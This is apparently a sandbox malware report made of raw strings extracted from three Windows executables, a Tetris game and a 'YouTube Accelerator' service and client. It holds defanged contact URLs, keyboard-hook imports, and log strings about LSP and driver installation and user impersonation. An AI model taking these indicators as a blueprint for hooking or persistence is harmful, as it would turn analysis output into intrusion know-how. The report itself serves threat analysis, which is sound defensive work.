.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>






The Malware connects to the servers at the folowing location(s):







Tetris.exe_1732:




.text
`.itext
`.data
.idata
.rdata
@.reloc
B.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
TaskDialogIndirect
EInvalidGraphicOperation
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
PasswordCharhOC
OnKeyDown
OnKeyPress8
OnKeyUp
ssHorizontal
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
Proportional
%s%s%s%s%s%s%s%s%s%s
UhL
AutoHotkeys
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
GlassFrame.Bottom
GlassFrame.Enabled
GlassFrame.Left
GlassFrame.Right
GlassFrame.SheetOfGlass
GlassFrame.Top
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
User32.dll
MAPI32.DLL
%s, %.2d %s %.4d %s %s
EIdCanNotBindPortInRange
EIdInvalidPortRange
C:\Builds\TpAddons\IndyNet\System\IdStreamVCL.pas
C:\Builds\TpAddons\IndyNet\System\IdGlobal.pas
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
Wship6.dll
EIdIPVersionUnsupportedU
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
127.0.0.1
C:\builds\TpAddons\IndyNet\System\IdStack.pas
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortSVW
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
Port<
C:\builds\TpAddons\IndyNet\Core\IdIOHandler.pas
"EIdTransparentProxyUDPNotSupported
TIdTCPClientCustom
IdTCPClient
TIdTCPClient
TIdTCPClient mG
BoundPort<
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
Password<
Port
0.0.0.1
0.0.0.0
DefaultPort
TIdTCPConnection
IdTCPConnection
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Type: %s
Content-Disposition: form-data; name="%s"
C:\builds\TpAddons\IndyNet\Protocols\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length exceeded (expected
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
Uh.hH
CommentURL
C:\builds\TpAddons\IndyNet\Protocols\IdZLibCompressorBase.pas
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
%d%s%d
TIdHTTPOption
IdHTTP
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP(
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPResponseT
TIdHTTPRequest
TIdHTTPProtocol(
TIdCustomHTTP
TIdCustomHTTP(
TIdHTTP
TIdHTTPX
HTTPOptions
EIdHTTPProtocolException
C:\builds\TpAddons\IndyNet\Protocols\IdHTTP.pas
HTTPS
https
HTTP/1.0 200 OK
HTTP/
IdHTTP1
yourNameEditKeyDown
yourMessageTMemoKeyDown
SubmitTBitBtnKeyDown
BitBtn1KeyDown
hXXp://VVV.thetetrisgame.com/editare_mesaje.php
hXXp://VVV.thetetrisgame.com/best-tetris-game-score.html
FormKeyDown
hXXp://VVV.thetetrisgame.com
?456789:;<=
!"#$%&'()* ,-./0123
advapi32.dll
RegOpenKeyExA
RegCloseKey
user32.dll
GetKeyboardType
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutNameA
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
gdi32.dll
SetViewportOrgEx
version.dll
GetCPInfo
RegFlushKey
ole32.dll
shell32.dll
ShellExecuteA
7 7$7(7,7074787<7@7
<(<,<0<4<8<<<
6%6 676>6
3 4$4(4,4
2 2$2(2,202
3-383}3
> >$>(>,>0>4>8><>
1"2&2*2.22262:2
< <$<(<,<0<4<8<
00050\0~0
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
.vrzr
KK$@K%>L.Vyw
KWindows
0IdHTTPHeaderInfo
UrlMon
 The Tetris Game 1.0 - VVV.TheTetrisGame.com
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Glyph.Data
Picture.Data
VVV.TheTetrisGame.com
,Game Over - submit your score on the website
/Your message (will be published on the website)
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.Accept
Request.BasicAuthentication
Request.UserAgent
&Mozilla/3.0 (compatible; Indy Library)
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
Reply Code is not valid: %s
Unknown Protocol(Request method requires HTTP version 1.1DThis authentication method is already registered with class name %s.
Unsupported operation.
Address type not supported."%d: Circular links are not allowed
File "%s" not found
Object type not supported.
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Address already in use. Cannot assign requested address.4Failed attempting to retrieve time zone information.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
Alt  Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
No help found for %s#No context-sensitive help installed
Unsupported clipboard format
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)"Unable to find a Table of Contents*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
VVV.thetetrisgame.com 2003, 2007
Tetris.exe
Email: [email protected]

YouTubeAcceleratorService.exe_3848:




.text
`.rdata
@.data
.text1
.adata
.data1
.pdata
.rsrc
uh9.tZ
otuh9.tZ
tZ9.tB
tV9.tB
l$$9.tZ
t9.tZ
uB9.tF
Tu8%XuJ@Uu
AUu.AUu
Windows CE
Windows 7
Windows Vista
Windows 2003 Server
Windows XP
Windows 2000
Windows NT
Windows Me
Windows 98
Windows 95
[CAcceleratorService::ExecuteServerAsWD] Exit
[CAcceleratorService::ExecuteServerAsWD] Impersonate Wakeup
\\.\pipe\GOOBZO_VAPIPESERVERENG
[CAcceleratorService::ExecuteServerAsWD] Enter
[CAcceleratorService::CreateEngineThread] Create thread result %d
[CAcceleratorService::CreateEngineThread] ___Error Creating the Engine Keep Alive event. error: %d
[CAcceleratorService::StopServiceExitMode] Name: %s
[CAcceleratorService::ProcessTimeoutEvent] ___Error wait for thread termination result %d
[CAcceleratorService::ProcessTimeoutEvent] ___Error StopThread result %d
[CAcceleratorService::ExecuteServer] Leave
[CAcceleratorService::ExecuteServer] Calling to ExecuteServerAsWD
[CAcceleratorService::ExecuteServer] ___Error creating the service named event. LE: %d
[CAcceleratorService::ExecuteServer] Enter
%d.%d.%d.%d
Name: %s
Path: %s
Version: %s
%s_%d.log
[CAcceleratorService::InstallDriver] Driver name: %s, Driver path: %s
[CAcceleratorService::UninstallDriver] Driver name: %s
[CAcceleratorService::InstallLsp] Module not found - LE: %d
[CAcceleratorService::InstallLsp] Function Install not found - LE: %d
[CAcceleratorService::InstallLsp] Module path: %s
[CAcceleratorService::UninstallLsp] Module not found - LE: %d
[CAcceleratorService::UninstallLsp] Function Remove not found - LE: %d
[CAcceleratorService::UninstallLsp] Module path: %s
[CAcceleratorService::RunCommand] Command: %d
[CLSPKeepAlive::GetLastLSPTestStatus] return %d
[CLSPKeepAlive::CheckOurLSPStatus]
[CLSPKeepAlive::Work] CheckOurLSPStatus - our LSP is installed!
[CLSPKeepAlive::Work] ___Error CheckOurLSPStatus - *** SBLSP NOT Installed ***
[CLSPKeepAlive::Work] ___Error creating the service named event. LE: %d
%sLow\%s\
%C:\Users\Public\Documents\%s\%s\
%s\%s\%s\
%s\Application Data\%s\%s\
[CDriverManager::CreateDriver] CreateService failed: %d
Tcpip
[CDriverManager::CreateDriver] Name: %s, Path: %s
[CDriverManager::Install] OpenSCManager failed: %d
[CDriverManager::Install] Name: %s, Path: %s
[CDriverManager::DeleteDriver] DeleteService failed: %d
[CDriverManager::DeleteDriver] OpenService failed: %d
[CDriverManager::DeleteDriver] Name: %s
[CDriverManager::UnInstall] OpenSCManager failed: %d
[CDriverManager::UnInstall] Name: %s
[CDriverManager::StartDriver] OpenService failed: %d
[CDriverManager::StartDriver] Name: %s
[CDriverManager::Load] OpenSCManager failed: %d
[CDriverManager::Load] Name: %s
[CDriverManager::StopDriver] OpenService failed: %d
[CDriverManager::StopDriver] Name: %s
[CDriverManager::UnLoad] OpenSCManager failed: %d
[CDriverManager::UnLoad] Name: %s
[CEventsThread::SetTimeoutResolution] From: %d -> To: %d
[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
[CEventsThread::WaitForMultipleEvents] TID=%X
[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
[CEventsThread::Start - Leave] TID=%X
[CEventsThread::Start] ___Error - Failed to create thread: %X
[CEventsThread::Stop - Leave] TID=%X
[CEventsThread::Stop - Enter] TID=%X
[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
[CEventsThread::AlertEvent] ___Error SetEvent failed: %d
[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
[CEventsThread::AlertEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] Event: %d
[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
[CEventsThread::ResetEvent] ___Error Not found Event: %d
[CEventsThread::ResetEvent] Event: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
[CEventsThread::RemoveEvent] ___Error Not found Event: %d
[CEventsThread::RemoveEvent] Event: %d
[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
[CEventsThread::Cleanup] Closing Handle: %d
[CEventsThread::WaitEvent] TID=%X
[CEventsThread::Work] TID=%X - Exit !!!
[CEventsThread::Work] WAIT_ABANDONED - %d
[CEventsThread::Work] TID=%X
[CEventsThread::AddEvent] ___Warning event handle already exists %d
[CEventsThread::AddEvent] ___Error invalid event handle %d
[CImpersonate::Impersonate] ImpersonateLoggedOnUser - Error: %d
[CImpersonate::Impersonate] Impersonated: %d
[CImpersonate::Revert] RevertToSelf - Error: %d
[CImpersonate::Revert] Impersonated: %d
[CImpersonate::Cleanup] Impersonated: %d
[CImpersonate::GetUserSID] LookupAccountNameW failed. GetLastError returned: %d
[CImpersonate::GetUserSID] The SID for %s is invalid.
[CImpersonate::GetUserSID] Not Enough Memory: %d
[CImpersonate::SetPrivilege] AdjustTokenPrivileges - Error: %d
[CImpersonate::SetPrivilege] LookupPrivilegeValue - Error: %d
[CImpersonate::OpenCurrentUserDesktop] - The function does not support Windows Vista and Windows 98
[CImpersonate::OpenCurrentUserDesktop] OpenDesktop - Error: %d
[CImpersonate::OpenCurrentUserDesktop] OpenInputDesktop - Error: %d
[CImpersonate::OpenCurrentUserDesktop] SetProcessWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] OpenWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] GetProcessWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] - The function does not support MAC
[CImpersonate::CreateProcessAsCurrentUser] CreateProcessAsUser - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] CreateEnvironmentBlock - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] AddAceToDesktop - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] AddAceToWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] GetLogonSID - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] DuplicateTokenEx - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] OpenDesktop - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] SetProcessWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] OpenWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] GetProcessWindowStation - Error: %d
[CImpersonate::AddAceToWindowStation] SetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToWindowStation] SetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToWindowStation] CopySid - Error: %d
[CImpersonate::AddAceToWindowStation] AddAce - Error: %d
[CImpersonate::AddAceToWindowStation] GetAce - Error: %d
[CImpersonate::AddAceToWindowStation] GetAclInformation - Error: %d
[CImpersonate::AddAceToWindowStation] GetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToDesktop] SetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToDesktop] SetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToDesktop] AddAccessAllowedAce - Error: %d
[CImpersonate::AddAceToDesktop] AddAce - Error: %d
[CImpersonate::AddAceToDesktop] GetAce - Error: %d
[CImpersonate::AddAceToDesktop] GetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToDesktop] GetUserObjectSecurity - Error: %d
[CImpersonate::OpenCurrentUserKey] LoadUserProfile - SUCCESS
[CImpersonate::OpenCurrentUserKey] LoadUserProfile failed - Error: %d
[CImpersonate::GetLogonUserName] GetLogonUserName - Error: %d
[CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - Error: %d
[CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - SUCCESS
[CImpersonate::OpenCurrentUserKey] Impersonated: %d
[CImpersonate::FindLoggedOnUser] Process32First - Error: %d
[CImpersonate::FindLoggedOnUser] OpenProcess - Error: %d
[CImpersonate::FindLoggedOnUser] OpenProcessToken - Error: %d
[CImpersonate::FindLoggedOnUser] CreateToolhelp32Snapshot failed - Error: %d
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe
[CImpersonate::FindLoggedOnUser] Impersonated: %d
[CImpersonate::GetLogonUserName] Name: %s
[CImpersonate::GetLogonUserName] GetUserName - Error: %d
[CImpersonateThread::NotifyImpersonateLogon] Time: %d
[CImpersonateThread::NotifyImpersonateLogoff] Time: %d
[CImpersonateThread::ProcessEvent] CreateProcess - CmdLine: %s, AppName: %s, ShowCmd: %d
[CImpersonateThread::CreateProcess] CmdLine: %s, AppName: %s, ShowCmd: %d
[CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(TRUE), LE: %d
[CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(FALSE) failed: %d
engine.dll
DestroyPipeEventThreadManager
CreatePipeEventThreadManager
ipc.dll
xmldb.dll
config.xml
<d/d/%d d:d:d::d 0x%X>
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
\StringFileInfo\x\%s
[SbTracer::BackupTraceFile] %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] SetSecurityDescriptorDacl failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeSecurityDescriptor failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the trusted owner. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the Everyone group. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the queue owner. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeAcl failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetLogonSID failed. Error code: 0x%X
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AllocateAndInitializeSid failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetTokenInformation failed. GetLastError returned: %d
[CServiceController::ChangeStartType] ___Error ChangeServiceConfig failed: %d
[CServiceController::ChangeStartType] ___Error OpenService: %s, failed: %d
[CServiceController::ChangeStartType] ___Error OpenSCManager failed: %d
[CServiceController::ChangeStartType] Name: %s
[CServiceController::ExecuteServer] Exit
[CServiceController::ExecuteServer] Enter
[CServiceController::ServiceMain] ___Error SetServiceStatus Failed: %d
[CServiceController::ServiceMain] ___Error RegisterServiceCtrlHandler Failed: %d
[CServiceController::UpdateServiceDespatchTable] ___Error Exception StartServiceCtrlDispatcher Failed: %d
[CServiceController::UpdateServiceDespatchTable] ___Error StartServiceCtrlDispatcher Failed: %d
[CServiceController::UpdateServiceDespatchTable] Enter, %s
[CServiceController::Remove] ___Error OpenService Failed: %d
[CServiceController::Remove] ___Error OpenSCManager Failed: %d
[CServiceController::GetStatus] ___Error QueryServiceStatus Failed: %d
[CServiceController::GetStatus] ___Error OpenService Failed: %d
[CServiceController::GetStatus] ___Error OpenSCManager Failed: %d
[CServiceController::Start] The service %s was started
[CServiceController::Start] ___Error StartService Failed: %d
[CServiceController::Start] ___Error OpenService Failed: %d
[CServiceController::Start] ___Error OpenSCManager Failed: %d
[CServiceController::Start] Going to start the service %s
[CServiceController::Stop] The service %s was stopped
YoutubeAcceleratorService.exe
[CServiceController::Stop] ___Error ControlService Failed: %d
[CServiceController::Stop] ___Error OpenService Failed: %d
[CServiceController::Stop] Going to stop the service %s
[CServiceController::Stop] ___Error SetServiceStatus Failed: %d
[CServiceController::Install] ___Error OpenService Failed: %d
[CServiceController::Install] ___Error QueryServiceStatus Failed: %d
[CServiceController::Install] ___Error CreateService Failed: %d
[CServiceController::Install] ___Error OpenSCManager Failed: %d
%s -%s -%s
%s\%s
[CServiceController::Install] ___Error GetModuleFileName Failed: %d
[CServiceController::GetArgsFromCmd] Exit
[CServiceController::GetArgsFromCmd] m_bSCMCmd = TRUE
[CServiceController::GetArgsFromCmd] Enter
[CServiceController::RunCommand] Args: %s
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
c:\BUILDS\Build_YTA\Client\VA_3_2\Bin\Release\YouTubeAcceleratorService.pdb
KERNEL32.dll
USER32.dll
ADVAPI32.dll
SHELL32.dll
VERSION.dll
USERENV.dll
PSAPI.DLL
.?AVIPipeEventsThread@@
.?AVCPipeEventThread@@
.?AV?$IMultiBaseInterface@VIPipeEventThreadManagerFactory@@@@
.?AVIPipeEventThreadManagerFactory@@
.?AV?$CMultiBaseInterface@VCPipeEventThreadManagerFactory@@VIPipeEventThreadManagerFactory@@@@
.?AVCPipeEventThreadManagerFactory@@
C:\PROGRA~2\YOUTUB~1\YouTubeAcceleratorService.exe
aSSSh
FTPjK
FtPj;
C.PjRV
]@ ]( ]8
tGHt.Ht&
FTPQ
.?AVunsupported_thread_option@boost@@
zcÁ
SetProcessShutdownParameters
kernel32.dll
COMCTL32.DLL
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
Required USB Key not found
Failed to execute target process
Cannot find import; DLL may be missing, corrupt, or wrong version
File "%s", function "%s"
File "%s", ordinal %d
File "%s", error %d
(Error code %d)
%X:DAF
(Location XEB, error code %d)
_PAD%d
RNX
%X::DAX
KERNEL32.DLL
.DbgLog
GetWindowsDirectoryW
CreateDialogIndirectParamW
Kernel32.dll
User32.dll
ComDlg32.dll
1.2.3
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_DENORMAL_OPERAND
boost::unsupported_thread_option
mscoree.dll
Visual C   CRT: Not enough memory to complete call to strerror.
.mixcrt
ADVAPI32.DLL
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
C:\PROGRA~2\YOUTUB~1\YouTubeAcceleratorService-2.DbgLog
GetWindowsDirectoryA
EnumThreadWindows
EnumWindows
CreateDialogIndirectParamA
GetAsyncKeyState
GDI32.dll
comdlg32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
^.Ad/
.Zvv[
j%FwL
e.tu/
5%up/
A.YNpN\n
%Um-IF
.BV$L|
%X1:S
`?T%Sj
%x@k4
.iyDY
j.Wsf
Cr.BxL
V.Fb7|
$"bM-Q}n
%x R\X
4%sPp
_%S3@
.LvHT
.owm;y,
}R.zmA
.bi@{
>I|.pt|d
t_\A
p}.GF
G){.mf
.xh$x
U.gs!
J|0.tL
.iJp`
.zE:aG
.7%Xs
-DED%xFqz
%cnzb
%UQzss
1%.Ey\=
/\%Dg
.FlC\5
.cA~;
P?=I_.or\
E.yb|4
%SuSw
T.UHuR
LZÁ
Q,-I}g_
4.gtE
-;M.EZk
1:](P%X
g.RUg
fH.XFH
.cP;_
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
OUTUB~1\YouTubeAcceleratorService.exe
3.3.9.5

YouTubeAccelerator.exe_2288:




.text
`.rdata
@.data
.text1
.adata
.data1
.pdata
.rsrc
uh9.tZ
otuh9.tZ
tZ9.tB
tV9.tB
l$$9.tZ
ub9.tM
@ SSh
SSSSh
D$<9.tZ
\9.tB
D$`9.tZ
FTPj
t#WSSh
D$(PSSh
s%j.Zf
tGHt.Ht&
@Uu.AUuv
%a,%d-%b-%Y %H:%M:%S
DestroyPipeEventThreadManager
CreatePipeEventThreadManager
spCmd
3.3.9.5
<img src="images/v4.gif" alt="" />
<img src="images/v3.gif" alt="" />
user32.dll
CWebBrowser2
CNotSupportedException
hhctrl.ocx
CCmdTarget
KERNEL32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
OLEACC.dll
c:\BUILDS\Build_YTA\Client\VA_3_2\Bin\Release_Unicode\YouTubeAcceleratorU.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
oledlg.dll
ole32.dll
OLEAUT32.dll
WININET.dll
WS2_32.dll
USERENV.dll
PSAPI.DLL
.?AVCCmdTarget@@
.PAVCException@@
.?AVCWebWindow@@
.?AVCHttp@@
.?AVCHttpAsync@@
.?AVCExecuteUpdate@@
.?AVCExitWindows@@
.?AVIHttpEngineConfiguration@@
.?AV?$CBaseInterface@VHttpEngineConfiguration@@VIHttpEngineConfiguration@@@@
.?AVHttpEngineConfiguration@@
.?AVIPipeEventsThread@@
.?AVCSLogReportEventThread@@
.?AVCPipeEventThread@@
